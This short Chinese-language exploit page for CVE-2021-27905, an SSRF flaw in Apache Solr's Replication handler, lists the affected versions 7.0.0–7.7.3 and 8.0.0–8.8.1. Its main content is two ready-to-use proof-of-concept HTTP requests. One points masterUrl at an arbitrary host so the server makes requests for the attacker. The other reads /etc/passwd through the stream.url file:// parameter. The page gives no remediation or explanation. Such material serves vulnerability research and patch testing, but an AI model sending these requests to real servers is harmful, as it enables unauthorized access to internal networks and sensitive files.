# CVE-2021-27905 Apache Solr Replication handler SSRF漏洞
==影響版本==
Apache Solr 7.0.0 - 7.7.3 Apache Solr 8.0.0 - 8.8.1
==POC==
GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1 HOST:target ....
GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 HOST:target ...
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容